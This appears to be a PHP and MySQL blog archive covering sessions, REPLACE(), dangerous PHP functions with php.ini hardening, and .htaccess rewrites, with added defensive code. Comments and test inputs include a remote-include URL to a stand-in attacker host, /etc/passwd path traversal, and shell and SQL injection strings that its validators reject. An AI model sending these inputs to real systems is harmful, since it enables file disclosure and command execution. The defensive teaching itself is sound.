Friday, February 27, 2009

Difference between session-register and $_SESSION in PHP

I read in the manual (http://www.php.net/session_register) that using $_SESSION['var'] = $value is better than calling session_register(). The reason is that session_register() only works when register_globals is On in php.ini, and for security reasons that directive has been Off by default since PHP 4.2.0. You should therefore use $_SESSION['var'] instead. (session_register() was later deprecated in PHP 5.3 and removed, together with register_globals, in PHP 5.4, so $_SESSION is now the only option.)
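The $_SESSION form in a small login/logout helper, as an added example that is not part of the original post. It runs from the CLI (the save path is pointed at the temp directory so no php.ini is needed) and also shows the one extra call a practitioner wants next to a login: session_regenerate_id(), which discards the pre-authentication session id so a fixated id never becomes an authenticated one.

```php
<?php
// Added example, not from the original post. The pre-PHP 5.4 way was
//     session_register('user'); $user = 'alice';
// which only worked with register_globals=On (both were removed in PHP 5.4).
// $_SESSION works on every PHP version and keeps the session state explicit.
// Runs from the CLI; the save path is set to the temp dir so no php.ini is needed.

ini_set('session.save_path', sys_get_temp_dir());
session_start();

function login(string $username): void
{
    // Issue a fresh session id on login so an id an attacker planted before
    // authentication (session fixation) never becomes an authenticated one.
    session_regenerate_id(true);
    $_SESSION['user'] = $username;
    $_SESSION['logged_in_at'] = time();
}

function current_user(): ?string
{
    return $_SESSION['user'] ?? null;
}

function logout(): void
{
    $_SESSION = [];          // clear the server-side state first ...
    session_destroy();       // ... then drop the session file itself
}

login('alice');
echo "logged in as: ", current_user() ?? 'nobody', "\n";   // alice
logout();
echo "after logout: ", current_user() ?? 'nobody', "\n";   // nobody
```

In a real application the session_regenerate_id() call belongs at every privilege change (login, role switch), not only at the first login.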

Wednesday, February 25, 2009

Using SELECT REPLACE with MySQL

I recently needed to compare the contents of two columns in a MySQL database that store the small and large images for a blog post. All the small ones start with "small" followed by a number and the large ones with "big" followed by a number. Enter the REPLACE() function to strip the small/big prefix and do the comparison! In this post I show how to use the REPLACE() function in MySQL.

The REPLACE() function takes three parameters:

  1. the string or column name to do the replacement on
  2. what to look for
  3. and what to replace it with

The following example replaces the 'aaa' part of 'aaa bbb ccc' with 'xyz' and the column returned from the SQL query will contain 'xyz bbb ccc':

SELECT REPLACE('aaa bbb ccc', 'aaa', 'xyz');

If you were doing this against the column "foo" you would do this instead:

SELECT REPLACE(foo, 'aaa', 'xyz');

My example

In my case I had columns called 'image_small' and 'image_large' with example data like so:

+------------+--------------+-------------+
| content_id | image_small  | image_large |
+------------+--------------+-------------+
|          1 | small1.jpg   | big1.jpg    |
|         26 | small26.jpg  | big26.jpg   |
|         27 | small27.jpg  | big27.gif   |
|         24 | small24.jpg  | big24.jpg   |
|        419 | small208.gif | big419.gif  |
+------------+--------------+-------------+

I wanted to replace 'small' with an empty string and 'big' with an empty string in the select query, and then see if they were the same in each column. This can be done with the following query:

SELECT content_id,
       REPLACE(image_small, 'small', '') AS image_small,
       REPLACE(image_large, 'big', '') AS image_large
FROM content

The resulting data looks like this:

+------------+-------------+-------------+
| content_id | image_small | image_large |
+------------+-------------+-------------+
|          1 | 1.jpg       | 1.jpg       |
|         26 | 26.jpg      | 26.jpg      |
|         27 | 27.jpg      | 27.gif      |
|         24 | 24.jpg      | 24.jpg      |
|        419 | 208.gif     | 419.gif     |
+------------+-------------+-------------+

Extending my example with IF()

The only problem with the above example is that I still need to scan every row to see which ones do and don't match. The query can be extended with an IF() to output 1 or 0 depending on whether the filenames (without the small and big parts) match.

SELECT content_id,
REPLACE(image_small, 'small', '') as image_small,
REPLACE(image_large, 'big', '') as image_large,
IF(REPLACE(image_small, 'small', '') = REPLACE(image_large, 'big', ''), 1, 0) AS matches
FROM content

This adds an extra column called "matches" which will display 1 if the two filenames match or 0 if they don't:

+------------+-------------+-------------+---------+
| content_id | image_small | image_large | matches |
+------------+-------------+-------------+---------+
|          1 | 1.jpg       | 1.jpg       |       1 |
|         26 | 26.jpg      | 26.jpg      |       1 |
|         27 | 27.jpg      | 27.gif      |       0 |
|         24 | 24.jpg      | 24.jpg      |       1 |
|        419 | 208.gif     | 419.gif     |       0 |
+------------+-------------+-------------+---------+

Now it's much easier to see which rows have the same filename once the 'small' and 'big' text has been removed, by combining the REPLACE() and IF() MySQL functions.

Tuesday, February 24, 2009

Holes in PHP applications

PHP Code Execution

* require() and include() - Both these functions read the specified file and interpret its contents as PHP code; with a user-controlled path this becomes a local or remote file inclusion
* eval() - Interprets a given string as PHP code
* preg_replace() - When used with the /e modifier this function interprets the replacement string as PHP code (the modifier was deprecated in PHP 5.5 and removed in 7.0; preg_replace_callback() is the replacement)

Command Execution

* exec() - Executes a specified command and returns the last line of the program's output (every line is available through the optional second argument)
* passthru() - Executes a specified command and passes all of its output directly to the remote browser, binary data included
* `` (backticks) - Executes the specified command and returns all of its output as a string (identical to shell_exec())
* system() - Much the same as passthru() but meant for text output; it echoes the output and returns the last line
* popen() - Executes a specified command and connects its output or input stream to a PHP file descriptor

File Disclosure

* fopen() - Opens a file and associates it with a PHP file descriptor
* readfile() - Reads a file and writes its contents directly to the remote browser
* file() - Reads an entire file into an array
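The three categories above side by side, as an added example that is not code from the original post: for each hole the vulnerable one-liner sits in a comment next to a hardened helper, and the script feeds both benign and constructed attacker input to the helpers. The attacker strings, the page whitelist and the temp directory the script creates for the file-disclosure case are all assumptions made for the demonstration.

```php
<?php
// Added example, not code from the original post: the three hole categories
// above, each as the vulnerable one-liner (in a comment) beside a hardened
// form. The attacker inputs below are constructed; $base is a temp directory
// this script creates for the file-disclosure demo.

// --- Code execution: include() of a user-controlled path ----------------------
// Vulnerable:  include($_GET['page'] . '.php');
// ?page=../../../etc/passwd%00 (PHP before 5.3.4) or ?page=http://evil.example/x
// (allow_url_fopen/allow_url_include on) turns it into file read or code exec.
function page_file_hardened(string $page, string $base): ?string
{
    // Whitelist of known pages; the user value never becomes part of a path
    $allowed = ['home', 'about', 'contact'];
    return in_array($page, $allowed, true) ? "$base/$page.php" : null;
}

// --- Command execution: exec() with user input --------------------------------
// Vulnerable:  exec('ping -c 1 ' . $_GET['host']);   // host = "x; cat /etc/passwd"
function ping_command_hardened(string $host): ?string
{
    // Validate the shape first, then quote for the shell anyway (defence in depth)
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}$/', $host)) {
        return null;
    }
    return 'ping -c 1 ' . escapeshellarg($host);
}

// --- File disclosure: readfile() with user input ------------------------------
// Vulnerable:  readfile('/var/www/files/' . $_GET['f']);   // f = "../../etc/passwd"
function download_path_hardened(string $name, string $dir): ?string
{
    $root = realpath($dir);
    // basename() drops any directory part; realpath() resolves .. and symlinks
    $candidate = realpath($dir . '/' . basename($name));
    if ($root === false || $candidate === false) {
        return null;
    }
    // Whatever it resolved to must still live under $dir
    return strpos($candidate, $root . DIRECTORY_SEPARATOR) === 0 ? $candidate : null;
}

// Demonstration with constructed inputs
$base = sys_get_temp_dir() . '/holes_demo';
if (!is_dir($base)) {
    mkdir($base);
}
file_put_contents("$base/readme.txt", "public\n");

$cases = [
    ['include',  page_file_hardened('home', '/var/www/pages')],
    ['include',  page_file_hardened('../../../etc/passwd', '/var/www/pages')],
    ['exec',     ping_command_hardened('example.com')],
    ['exec',     ping_command_hardened('example.com; id')],
    ['readfile', download_path_hardened('readme.txt', $base)],
    ['readfile', download_path_hardened('../../../etc/passwd', $base)],
];
foreach ($cases as [$hole, $result]) {
    printf("%-9s %s\n", $hole, $result ?? 'REJECTED');
}
```

The order matters in the file case: realpath() is applied after basename(), and the prefix check is done on the resolved path, so a symlink inside the download directory that points outside it is rejected too.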

Configuration

* Set register_globals off - This option stops PHP creating global variables from user input. That is, if a user submits the form variable 'hello', PHP won't set $hello, only $_GET['hello'] / $_POST['hello'] (HTTP_GET_VARS / HTTP_POST_VARS in old code). This is the mother of all other options and the best single option for PHP security; it also breaks basically every third-party application that relied on it and makes PHP programming less convenient. It has been off by default since PHP 4.2.0 and the directive no longer exists as of PHP 5.4.
* Set safe_mode on - this introduces a large variety of restrictions including:
o The ability to restrict which commands can be executed (by exec() etc.)
o The ability to restrict which functions can be used
o Restricts file access based on ownership of script and target file
o Kills file upload completely
This is a great option for ISP environments (for which it is designed) but it can also greatly improve the security of normal PHP environments given proper configuration. See the Safe Mode manual page for details. Note that safe_mode was deprecated in PHP 5.3 and removed in 5.4; on those versions use open_basedir and disable_functions for the same effect.
* Set open_basedir - This option prevents any file operations on files outside the specified directories. It can effectively kill a variety of local include() and remote file attacks. Caution is still required in regards to file uploads and session files (the session save path, for instance, has to fall inside the allowed directories).
* Set display_errors off, log_errors on - This prevents PHP error messages being displayed in the returned web page, which limits an attacker's exploration of the script they are attacking: error text leaks file paths, SQL fragments and variable names. It can also make debugging very frustrating, so read the error log instead.
* Set allow_url_fopen off - This stops the remote-files functionality (fopen('http://...'), include('http://...')). Very few sites really need it. Since PHP 5.2 a separate allow_url_include directive, off by default, controls include()/require() of URLs; keep both off unless the site genuinely needs remote fopen().
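An ini_get() audit of the directives in the list above, added here as an example and not taken from the original post. Run it once from the CLI and once as a web page, because the two SAPIs can be configured differently; the expected values are the ones the list recommends. register_globals and safe_mode no longer exist as of PHP 5.4, which the audit reports as "absent" rather than as a weakness.

```php
<?php
// Added example, not from the original post: an ini_get() audit of the
// directives listed above. Expected values are the hardened ones from the
// list; directives removed in PHP 5.4 are reported as absent, not as weak.

function ini_bool(string $name): ?bool
{
    $raw = ini_get($name);
    if ($raw === false) {
        return null;                       // directive unknown to this PHP build
    }
    $raw = strtolower((string) $raw);
    if ($raw === 'stderr' || $raw === 'stdout') {
        return true;                       // display_errors special values: still "on"
    }
    return filter_var($raw, FILTER_VALIDATE_BOOLEAN);
}

function audit_php_config(): array
{
    $expected = [
        'register_globals' => false,
        'safe_mode'        => true,
        'display_errors'   => false,
        'log_errors'       => true,
        'allow_url_fopen'  => false,
    ];
    $report = [];
    foreach ($expected as $name => $want) {
        $actual = ini_bool($name);
        if ($actual === null) {
            $report[$name] = 'absent (not in this PHP version)';
        } elseif ($actual === $want) {
            $report[$name] = 'ok';
        } else {
            $report[$name] = sprintf('WEAK (is %s, want %s)',
                $actual ? 'On' : 'Off', $want ? 'On' : 'Off');
        }
    }
    // open_basedir is a path list, so only "set at all" can be checked generically
    $basedir = (string) ini_get('open_basedir');
    $report['open_basedir'] = $basedir === ''
        ? 'WEAK (unset: scripts may open any readable file)'
        : 'ok (' . $basedir . ')';
    return $report;
}

foreach (audit_php_config() as $name => $status) {
    printf("%-17s %s\n", $name, $status);
}
```

The CLI deliberately defaults display_errors to STDOUT, so a WEAK result for that directive from the command line is expected; the web SAPI result is the one that matters.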

Monday, February 23, 2009

5 useful url rewriting examples using .htaccess.

If you are looking for examples of URL rewriting then this post might be useful for you. In this post I've given five useful examples of URL rewriting using .htaccess. If you don't know anything about URL rewriting then please check my older post about URL rewriting using .htaccess.

Now let’s look at the examples

1)Rewriting product.php?id=12 to product-12.html

This is an internal rewrite, not a redirect: the browser's address bar keeps the static-looking product-12.html while Apache serves product.php?id=12, so the .php extension and the dynamic URL (with its "?" character) are hidden. The [0-9]+ pattern means only numeric ids reach the script through this URL, but product.php?id=... itself stays reachable directly, so product.php must still validate id.

RewriteEngine on
RewriteRule ^product-([0-9]+)\.html$ product.php?id=$1

2) Rewriting product.php?id=12 to product/ipod-nano/12.html

SEO experts always suggest putting the main keyword in the URL. With the following rewrite you can display the name of the product in the URL. Note that the rule passes only the numeric $2 to product.php; the slug in $1 is decorative, so any slug paired with id 12 serves the same page.

RewriteEngine on
RewriteRule ^product/([a-zA-Z0-9_-]+)/([0-9]+)\.html$ product.php?id=$2

3) Redirecting non www URL to www URL

If you type yahoo.com in the browser it is redirected to www.yahoo.com. If you want to do the same with your website then put the following code in the .htaccess file. What is the benefit of this kind of redirection? Please check the post about SEO-friendly (301) redirects in PHP and .htaccess.

RewriteEngine On
RewriteCond %{HTTP_HOST} ^optimaxwebsolutions\.com$
RewriteRule (.*) http://www.optimaxwebsolutions.com/$1 [R=301,L]

4) Rewriting yoursite.com/user.php?username=xyz to yoursite.com/xyz

Have you checked zorpia.com? If you want to do a rewrite like that, i.e. http://yoursite.com/xyz to http://yoursite.com/user.php?username=xyz, then add the following code to the .htaccess file. Be aware that the pattern matches any single path segment made of those characters, so a real file or directory such as /images would be rewritten to user.php?username=images as well; a RewriteCond on %{REQUEST_FILENAME} with !-f and !-d in front of the rules keeps existing paths out of it.

RewriteEngine On
RewriteRule ^([a-zA-Z0-9_-]+)$ user.php?username=$1
RewriteRule ^([a-zA-Z0-9_-]+)/$ user.php?username=$1
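The PHP side of rules 1, 2 and 4, added here as an example and not part of the original post. mod_rewrite's [0-9]+ and [a-zA-Z0-9_-]+ only shape the pretty URL; the real scripts stay reachable as product.php?id=... and user.php?username=..., so each one validates its own input and passes the id to the database as a bound parameter. The product table, its rows and the use of an in-memory SQLite database (via the pdo_sqlite extension) in place of MySQL are assumptions made so the script runs stand-alone.

```php
<?php
// Added example, not part of the original post: the PHP side of rules 1, 2 and 4.
// The rewrite patterns only constrain the pretty URL; product.php and user.php
// are still reachable directly, so they validate their own input. The schema,
// rows and the SQLite stand-in for MySQL are constructed for the demonstration.

function product_id_from_query(array $get): ?int
{
    // ctype_digit() rejects "", "-1", "12abc", "1e3" and "12 OR 1=1"; cast afterwards
    if (!isset($get['id']) || !is_string($get['id']) || !ctype_digit($get['id'])) {
        return null;
    }
    $id = (int) $get['id'];
    return $id > 0 ? $id : null;
}

function username_from_query(array $get): ?string
{
    // Same character class as the RewriteRule, plus a length cap the rule lacks
    if (!isset($get['username']) || !is_string($get['username'])
        || !preg_match('/^[A-Za-z0-9_-]{1,32}$/', $get['username'])) {
        return null;
    }
    return $get['username'];
}

function fetch_product(PDO $pdo, int $id): ?array
{
    // Bound parameter: the id never becomes part of the SQL string
    $stmt = $pdo->prepare('SELECT id, name FROM product WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration with an in-memory SQLite database standing in for MySQL
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO product (id, name) VALUES (12, 'ipod-nano')");

foreach (['12', '12 OR 1=1', '-1', ''] as $raw) {
    $id = product_id_from_query(['id' => $raw]);
    $product = $id === null ? null : fetch_product($pdo, $id);
    printf("id=%-12s -> %s\n", var_export($raw, true), $product ? $product['name'] : 'rejected');
}
foreach (['xyz', '../admin', 'bob;id'] as $raw) {
    printf("username=%-12s -> %s\n", var_export($raw, true),
        username_from_query(['username' => $raw]) ?? 'rejected');
}
```

Only '12' and 'xyz' pass; everything else is rejected before any query runs, which is the behaviour to expect whether the request arrived through the pretty URL or by calling the .php file directly.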

5) Redirecting the domain to a new subfolder of inside public_html.

Suppose you've redeveloped your site and all the new development resides inside the "new" folder under the root folder, so the new site is reached as "test.com/new". Moving those files to the root folder can be a hectic process, so instead create the following code in the .htaccess file and place it in the root folder of the website. As a result www.test.com points at the files inside the "new" folder. The third RewriteCond stops the rule from rewriting a /new/... request a second time.

RewriteEngine On
RewriteCond %{HTTP_HOST} ^test\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.test\.com$
RewriteCond %{REQUEST_URI} !^/new/
RewriteRule (.*) /new/$1
